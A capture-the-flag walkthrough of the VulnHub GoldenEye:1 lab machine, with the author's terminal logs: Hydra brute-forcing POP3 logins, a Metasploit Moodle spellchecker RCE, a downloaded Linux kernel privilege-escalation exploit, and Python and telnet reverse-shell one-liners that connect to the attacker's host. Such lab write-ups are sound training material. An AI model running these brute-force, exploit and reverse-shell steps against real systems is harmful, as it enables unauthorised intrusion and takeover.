GOLDENEYE: 1
About Release
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- GoldenEye-v1.ova (Size: 805 MB)
- Download: https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq
- Download (Mirror): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
Description
I recently got done creating an OSCP type vulnerable machine that’s themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I’d rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there’s a hint of CTF flavor.
I’ve created and validated on VMware and VirtualBox. You won’t need any extra tools other than what’s on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click “retry” if prompted, upon initially starting it up because of formatting.
## Changelog Beta - 2018-05-02 v1 - 2018-05-04
File Information
- Filename: GoldenEye-v1.ova
- File size: 805 MB
- MD5: 76C4A898F4BF0D9071C6B7E0A49D7BA8
- SHA1: B2A736B84A013B5FAB7F8C016C1D29D26F3A6D23
Virtual Machine
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
Networking
- DHCP service: Enabled
- IP address: Automatically assign
Screenshots
Currently scanning: 172.27.157.0/16 | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1200
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.219.1 f2:18:98:21:29:69 4 240 Unknown vendor
192.168.219.2 00:50:56:f1:66:62 5 300 VMware, Inc.
192.168.219.179 00:0c:29:fd:c5:49 4 240 VMware, Inc.
192.168.219.254 00:50:56:ed:88:be 7 420 VMware, Inc.
http://192.168.219.179/
http://192.168.219.179/terminal.js
<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>
<span id="GoldenEyeText" class="typeing"></span><span class='blinker'> </span>
<script src="terminal.js"></script>
</html>
var data = [
{
GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
}
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
var currentElementId = allElements[j].id;
var currentElementIdContent = data[0][currentElementId];
var element = document.getElementById(currentElementId);
var devTypeText = currentElementIdContent;
var i = 0, isTag, text;
(function type() {
text = devTypeText.slice(0, ++i);
if (text === devTypeText) return;
element.innerHTML = text + `<span class='blinker'> </span>`;
var char = text.slice(-1);
if (char === "<") isTag = true;
if (char === ">") isTag = false;
if (isTag) return type();
setTimeout(type, 60);
})();
}
http://www.esjson.com/unicodeEncode.html
InvincibleHack3r
GOLDENEYE
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo nmap -sC -sV -p1024-65535 192.168.219.179
[sudo] pinginglab 的密码:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-24 20:09 CST
Nmap scan report for 192.168.219.179 (192.168.219.179)
Host is up (0.00077s latency).
Not shown: 64510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) USER AUTH-RESP-CODE CAPA RESP-CODES TOP UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA STLS RESP-CODES UIDL PIPELINING AUTH-RESP-CODE USER TOP SASL(PLAIN)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:FD:C5:49 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
http://192.168.219.179/sev-home/
<html>
<head>
<link rel="stylesheet" href="index.css">
</head>
<video poster="val.jpg" id="bgvid" playsinline autoplay muted loop>
<source src="moonraker.webm" type="video/webm">
</video>
<div id="golden">
<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>
<script src="index.js"></script>
<!--
Qualified GoldenEye Network Operator Supervisors:
Natalya
Boris
-->
</html>
vim 1.txt
`┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]`
`└─$ cat 1.txt
Natalya
Boris
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.219.179:55007
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-24 20:19:00
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.219.179:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.219.179 login: Natalya password: bird
[STATUS] 101.00 tries/min, 303 tries in 00:03h, 141 to do in 00:02h, 16 active
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[STATUS] 91.50 tries/min, 366 tries in 00:04h, 78 to do in 00:01h, 16 active
[55007][pop3] host: 192.168.219.179 login: Boris password: secret1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-24 20:23:36
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
Natalya
-ERR Unknown command.
user:Natalya
-ERR Unknown command.
USER Natalya
+OK
PASS bird
+OK Logged in.
-ERR Unknown command:
ls
-ERR Unknown command: LS
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
show
-ERR Unknown command: SHOW
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
┌──(pinginglab㉿pinginglab)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 pinginglab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 updates.acunetix.com
127.0.0.1 erp.acunetix.com
192.168.219.179 severnaya-station.com
username: xenia
password: RCP90rulez!
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qyd44DsY-1671891532133)(…/…/Library/Application%20Support/typora-user-images/image-20221224203930680.png)]
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ hydra -l Doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.219.179:55007
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-24 20:38:25
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.219.179:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
k
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.219.179 login: Doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-24 20:40:56
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
USER Doak
+OK
PASS goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
http://192.168.219.179/dir007key/for-007.jpg
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ exiftool for-007.jpg
ExifTool Version Number : 12.52
File Name : for-007.jpg
Directory : .
File Size : 15 kB
File Modification Date/Time : 2022:12:24 20:47:35+08:00
File Access Date/Time : 2022:12:24 20:48:13+08:00
File Inode Change Date/Time : 2022:12:24 20:47:47+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$
xWinter1995x!
admin try logon
set text editor
get common shell
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ msfconsole
To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.2.1-dev ]
+ -- --=[ 2225 exploits - 1171 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 > search moodle
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_admin_shell_upload 2019-04-28 excellent Yes Moodle Admin Shell Upload
1 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
2 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution
3 exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce 2020-07-20 good Yes Moodle Teacher Enrollment Privilege Escalation to RCE
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
msf6 > use 1
msf6 exploit(multi/http/moodle_spelling_binary_rce) > show options
Module options (exploit/multi/http/moodle_spelling_binary_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,
type:host:port][...]
RHOSTS yes The target host(s), see https://github.c
om/rapid7/metasploit-framework/wiki/Usin
g-Metasploit
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersona
te
SSL false no Negotiate SSL/TLS for outgoing connectio
ns
TARGETURI /moodle/ yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set PASSWORD xWinter1995x!
PASSWORD => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhosts severnaya-station.com
rhosts => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 192.168.219.177
lhost => 192.168.219.177
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/bind_ruby
set payload cmd/unix/bind_ruby_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_python
set payload cmd/unix/reverse_python_ssl
set payload cmd/unix/reverse_ruby
set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[*] Started reverse TCP double handler on 192.168.219.177:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
id
[-] Exploit aborted due to failure: payload-failed: Error triggering payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) >
msf6 exploit(multi/http/moodle_spelling_binary_rce) > id
[*] exec: id
用户id=1000(pinginglab) 组id=1000(pinginglab) 组=1000(pinginglab),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),121(wireshark),126(bluetooth),138(scanner),146(kaboxer),148(docker)
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[*] Started reverse TCP double handler on 192.168.219.177:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo lLIiHWNqouPcOHQu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "lLIiHWNqouPcOHQu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.219.177:4444 -> 192.168.219.179:33338) at 2022-12-24 21:52:49 +0800
1
sh: 7: 1: not found
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privelage
┌──(pinginglab㉿pinginglab)-[~]
└─$ searchsploit Linux ubuntu 3.13.
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/1 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/1 | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x6 | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONF | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP S | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Loca | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'ne | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14. | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.0 | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access V | linux/local/41760.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(pinginglab㉿pinginglab)-[~]
└─$
text edit
gcc -》 cc
python -c 'import pty; pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ iid
iid
No command 'iid' found, did you mean:
Command 'id' from package 'coreutils' (main)
Command 'ibid' from package 'ibid' (universe)
Command 'eid' from package 'id-utils' (universe)
Command 'ii' from package 'ii' (universe)
Command 'fid' from package 'id-utils' (universe)
Command 'kid' from package 'python-kid' (universe)
Command 'aid' from package 'id-utils' (universe)
Command 'gid' from package 'id-utils' (universe)
Command 'lid' from package 'id-utils' (universe)
Command 'lid' from package 'libuser' (universe)
iid: command not found
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
changelog.txt config.php editor_plugin.js img rpc.php
classes css editor_plugin_src.js includes
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
<.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 05:58:55-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c'
100%[======================================>] 4,968 --.-K/s in 0s
2022-12-24 05:58:55 (975 MB/s) - '37292.c' saved [4968/4968]
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
<.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 06:00:20-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c.1'
100%[======================================>] 4,968 --.-K/s in 0s
2022-12-24 06:00:20 (789 MB/s) - '37292.c.1' saved [4968/4968]
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c changelog.txt config.php editor_plugin.js img rpc.php
37292.c.1 classes css editor_plugin_src.js includes
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -o exp2 37292.c.1
cc -o exp2 37292.c.1
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc
cc
clang: error: no input files
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -h
cc -h
clang: error: unknown argument: '-h'
clang: error: no input files
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292.c.1 -o exp2
cc 37292.c.1 -o exp2
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ mv 37292.c.1 37292-2.c
mv 37292.c.1 37292-2.c
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292-2.c -o exp2
cc 37292-2.c -o exp2
37292-2.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292-2.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292-2.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292-2.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292-2.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292-2.c changelog.txt config.php editor_plugin.js exp2 includes
37292.c classes css editor_plugin_src.js img rpc.php
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp2
./exp2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# ls /root
ls /root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
# ls /root
ls /root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
cat: /root/flag.txt: No such file or directory
# pwd
pwd
/root
# ls
ls
# ls -al
ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
568628e0d993b1973adc718237da6e93
or reverse shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.211.55.28”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
sh -c ‘(sleep 3655|telnet 192.168.219.177 4444|while : ; do sh && break; done 2>&1|telnet 192.168.219.177 4444 >/dev/null 2>&1 &)’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.219.177”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -vlp 6666
listening on [any] 6666 ...
id
id
id
connect to [192.168.219.177] from severnaya-station.com [192.168.219.179] 41004
/bin/sh: 0: can't access tty; job control turned off
$ $ $ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ $ $ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ ls
37292-2.c
37292.c
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
img
includes
rpc.php
$ ./exp2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
# ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
#
#
#
# exit
$ uname -a
